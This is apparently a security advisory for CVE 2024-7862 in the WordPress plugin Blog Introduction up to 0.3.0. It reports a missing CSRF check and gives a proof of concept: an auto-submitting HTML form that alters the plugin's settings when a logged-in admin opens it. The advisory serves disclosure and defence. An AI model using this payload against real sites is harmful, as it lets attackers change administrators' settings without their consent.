Blog Introduction <= 0.3.0 – Settings Update via CSRF | CVE 2024-7862

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

Make a logged in admin open an HTML file containing:

```
<form action="https://example.com/wp-admin/options-general.php?page=Blogintroduction" method="POST">
    <input type="text" name="plugin_blogintroduction_hidden" value="Y">
    <input type="text" name="blogintroduction-websnaprapikey" value="hacked">
    <input type="text" name="blogintroduction-width" value="170">
    <input type="text" name="blogintroduction-height" value="">
    <input type="text" name="blogintroduction-use4to3ratio" value="1">
    <input type="text" name="blogintroduction-imagesource" value="websnapr">
    <input type="text" name="blogintroduction-category" value="all">
    <input type="text" name="blogintroduction-target" value="_top">
    <input type="text" name="blogintroduction-refreshAfter" value="10">
    <input type="text" name="Submit" value="Update Options">
</form>
<script>
    document.forms[0].submit();
</script>
```